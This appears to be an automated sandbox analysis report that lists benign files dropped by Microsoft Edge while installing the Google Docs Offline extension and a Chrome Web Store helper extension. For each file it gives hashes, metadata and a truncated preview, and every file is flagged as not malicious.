                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1205
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                    MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                    SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                    SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                    SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):843
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                    MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                    SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                    SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                    SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):912
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                    MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                    SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                    SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                    SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11406
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                    MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                    SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                    SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                    SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):854
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                    MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                    SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                    SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                    SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2525
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                    MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                    SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                    SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                    SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                    MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                    SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                    SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                    SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):122218
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                    MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                    SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                    SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                    SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):291
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                    MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                    SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                    SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                    SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):130866
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                    MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                    SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                    SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                    SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_933105069\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1753
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                    MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                    SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                    SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                    SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_933105069\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9815
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                    MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                    SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                    SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                    SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_933105069\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):10388
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                    MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                    SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                    SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                    SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                    Malicious:false
